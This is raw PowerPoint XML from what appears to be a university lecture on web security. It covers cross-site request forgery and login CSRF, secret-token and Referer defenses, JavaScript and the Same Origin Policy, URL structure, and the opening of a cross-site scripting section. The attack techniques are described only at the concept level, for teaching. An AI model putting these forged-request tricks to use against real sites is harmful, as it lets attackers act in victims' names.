              <a:ext cx="2" cy="120419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713" name="$$$"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="54976" y="303646"/>
              <a:ext cx="809143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$$$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" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="701" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="704" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="706" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="710" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="711" grpId="6" animBg="1" advAuto="0"/>
      <p:bldP spid="714" grpId="7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ross-Site Request Forge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r>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718" name="Target: User who has an account on a vulnerable serv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Target</a:t>
            </a:r>
            <a:r>
              <a:t>: User who has an account on a vulnerable server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 goal</a:t>
            </a:r>
            <a:r>
              <a:t>: Send requests to server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via the user’s browser</a:t>
            </a:r>
            <a:r>
              <a:t> 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Look to the server like the user intended them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Attacker needs</a:t>
            </a:r>
            <a:r>
              <a:t>: Ability to get the user to “click a link” crafted by the attacker that goes to the vulnerable site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Key tricks</a:t>
            </a:r>
            <a:r>
              <a:t>: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Requests to the web server have predictable structure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Use e.g.,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&lt;img src=…&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> to force victim to send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" grpId="1" build="p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Variation: Login CSR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Variation: Login CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="724" name="Forge login request to honest sit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Forge login request to honest site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Using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attacker’s </a:t>
            </a:r>
            <a:r>
              <a:t>username and password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>Victim visits the site under attacker’s account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>What harm can this cause?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7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1476" y="8070898"/>
            <a:ext cx="2529329" cy="128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5273" y="8228944"/>
            <a:ext cx="2934850" cy="965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1" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="725" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="726" grpId="3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Defense: Secret to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Defense: Secret token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="731" name="All (sensitive) requests include a secret tok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455"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>All (sensitive) requests include a secret token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="853439" lvl="1" indent="-426719" defTabSz="560831">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3455"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Attacker can’t guess it for malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="853439" lvl="1" indent="-426719" defTabSz="560831">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3455"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Token is derived by e.g. hashing site secret, timestamp, session-id, additional randomness.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1" build="p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Defense: Referer valid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Defense: Referer validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="734" name="Recall: Browser sets REFERER to source of clicked link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4965890"/>
          </a:xfrm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880"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Recall: Browser sets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REFERER</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> to source of clicked link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-355600" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:defRPr sz="2880"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Policy: Trust requests from pages user could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legitimately</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> reach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="711200" lvl="1" indent="-355600" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2880"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: www.bank.com                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="711200" lvl="1" indent="-355600" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2880"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: www.attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="711200" lvl="1" indent="-355600" defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr sz="2880"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="735" name="✔︎"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7320967" y="3876947"/>
            <a:ext cx="82650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spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="4500">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✔︎</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="736" name="✘"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7483683" y="4561295"/>
            <a:ext cx="50106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1500"/>
              </a:spcBef>
              <a:defRPr sz="450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>
              <a:defRPr sz="1200"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4500"/>
              <a:t>✘</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="737" name="?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556516" y="5101952"/>
            <a:ext cx="35540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1500"/>
              </a:spcBef>
              <a:defRPr sz="450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>
              <a:defRPr sz="1200"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="450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" grpId="1" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="735" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="736" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="737" grpId="4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Dynamic web pages"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1791353" y="3638550"/>
            <a:ext cx="9422094" cy="2476501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Dynamic web pages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Rather than static or dynamic HTML, web pages can be a program written in Javascript:"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="1270000"/>
            <a:ext cx="11099800" cy="2373459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Rather than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>just </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>, web pages can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>a program written in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="&lt;html&gt;&lt;body&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514054" y="3808093"/>
            <a:ext cx="7976692" cy="2730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&lt;html&gt;&lt;body&gt;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Hello, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;b&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;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	var a = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:t>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	var b = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:t>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	document.write(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“world: “</a:t>
            </a:r>
            <a:r>
              <a:t>, a+b, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“&lt;/b&gt;”</a:t>
            </a:r>
            <a:r>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="C84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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="C84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&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7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1369" y="6989358"/>
            <a:ext cx="9682062" cy="7729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" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="761" grpId="2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Javascri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Javascript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="764" name="Powerful web page programming langua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Powerful web page </a:t>
            </a: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programming language</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1333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 smtClean="0"/>
              <a:t>Scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>embedded in pages returned by the web server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Scripts are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executed by the browser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>.  They can: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Alter page contents</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="020000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(DOM objects)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Track events</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> (mouse clicks, motion, keystrokes)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Issue web requests</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> &amp; read replies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Maintain persistent connections</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> (AJAX)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Read and set cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="767" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9565823" y="541754"/>
            <a:ext cx="2401713" cy="1158967"/>
            <a:chOff x="-278674" y="-131937"/>
            <a:chExt cx="2401712" cy="1158965"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="765" name="no relation to Java"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-172934" y="-111125"/>
              <a:ext cx="2295973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no relation</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>to Java</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="769" name="Connection Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-278675" y="-131938"/>
              <a:ext cx="177808" cy="115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24" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="16224" y="21600"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="-4580" y="14311"/>
                    <a:pt x="-5376" y="7111"/>
                    <a:pt x="13836" y="0"/>
                  </a:cubicBez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770" name="Connection Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11923686" y="552040"/>
            <a:ext cx="177808" cy="1158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24" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="21600"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="20804" y="14311"/>
                  <a:pt x="21600" y="7111"/>
                  <a:pt x="2388" y="0"/>
                </a:cubicBez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" grpId="1" build="p" bldLvl="5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What could go wro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could go wrong?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="773" name="Browsers need to confine Javascript’s pow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Browsers need to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confine </a:t>
            </a:r>
            <a:r>
              <a:t>Javascript’s power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>A script on </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:t> should not be able to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Alter the layout of a </a:t>
            </a:r>
            <a:r>
              <a:rPr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page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Read user keystrokes from a </a:t>
            </a:r>
            <a:r>
              <a:rPr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page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Read cookies belonging to </a:t>
            </a:r>
            <a:r>
              <a:rPr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bank.com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1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ame Origin Poli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Same Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="776" name="Browsers provide isolation for javascript via SO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4100"/>
              </a:spcBef>
              <a:defRPr sz="3528"/>
            </a:pPr>
            <a:r>
              <a:t>Browsers provide isolation for javascript via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SOP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Browser associates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web page elements</a:t>
            </a:r>
            <a:r>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="871219" lvl="1" indent="-435609" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3528"/>
            </a:pPr>
            <a:r>
              <a:t>Layout, cookies, events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…with their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origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="871219" lvl="1" indent="-435609" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:defRPr sz="3528"/>
            </a:pPr>
            <a:r>
              <a:t>Hostname (</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:t>) that provided them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3528">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3528">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:pP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SOP</a:t>
            </a:r>
            <a:r>
              <a:t> =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only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scripts received from a web page’s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origin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indent="0" algn="ctr" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3528">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr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have access to the page’s elements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Interacting with web serv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Interacting with web servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="http://www.umiacs.umd.edu/~mmazurek/index.html"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498140" y="3572802"/>
            <a:ext cx="9151544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 u="sng">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
                <a:hlinkClick r:id=""/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ece</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>.umd.edu/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>danadach</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/index.html</a:t>
            </a:r>
            <a:endParaRPr u="sng" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Resources which are identified by a URL…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2222810" y="2443524"/>
            <a:ext cx="855918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Resources</a:t>
            </a:r>
            <a:r>
              <a:t> which are identified by a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>(Universal Resource Locator)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="446" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="120972" y="3660916"/>
            <a:ext cx="1840137" cy="1223702"/>
            <a:chOff x="-102469" y="-863630"/>
            <a:chExt cx="1840135" cy="1223701"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="444" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="209143" y="-863631"/>
              <a:ext cx="1216910" cy="533345"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 14758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5" name="Protocol"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-102470" y="-236829"/>
              <a:ext cx="1840137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Protocol</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="ftp…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219224" y="5041633"/>
            <a:ext cx="1022716" cy="1123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4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ftp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="450" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2308043" y="3623758"/>
            <a:ext cx="4185374" cy="1279438"/>
            <a:chOff x="-711991" y="-863631"/>
            <a:chExt cx="4185372" cy="1279437"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="448" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-711991" y="-863631"/>
              <a:ext cx="2765869" cy="533345"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 14758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9" name="Hostname/server"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-119678" y="-181095"/>
              <a:ext cx="3593059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Hostname/server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Translated to an IP address by DNS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2954324" y="4799532"/>
            <a:ext cx="7096152" cy="1124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400"/>
            </a:pPr>
            <a:r>
              <a:t>Translated to an IP address by DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>(e.g.,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128.8.127.3</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="454" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5283200" y="3629778"/>
            <a:ext cx="6974559" cy="3555577"/>
            <a:chOff x="-2646322" y="-863631"/>
            <a:chExt cx="6974558" cy="3555575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="452" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2646322" y="-863631"/>
              <a:ext cx="6019799" cy="533345"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 14758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Path to a resource"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="471838" y="2095043"/>
              <a:ext cx="3856398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Path to a resource</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Here, the file index.html is static content…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4616511" y="7173457"/>
            <a:ext cx="759012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3400"/>
            </a:pPr>
            <a:r>
              <a:t>Here, the file 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index.html</a:t>
            </a:r>
            <a:r>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>static content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>i.e.,  a fixed file returned by the server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Connection Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10851630" y="4225147"/>
            <a:ext cx="715278" cy="2313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718" y="21600"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="15229"/>
                  <a:pt x="21361" y="8029"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="88900">
            <a:solidFill>
              <a:schemeClr val="accent5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1129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0" animBg="1" advAuto="0"/>
      <p:bldP spid="446" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="447" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="447" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="450" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="450" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="451" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="451" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="454" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="455" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="457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Cross-site scripting (XSS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Cross-site scripting (XSS)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wo types of X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types of XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="810" name="Stored (or “persistent”) XSS attack…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="2857896"/>
            <a:ext cx="11099800" cy="3119197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
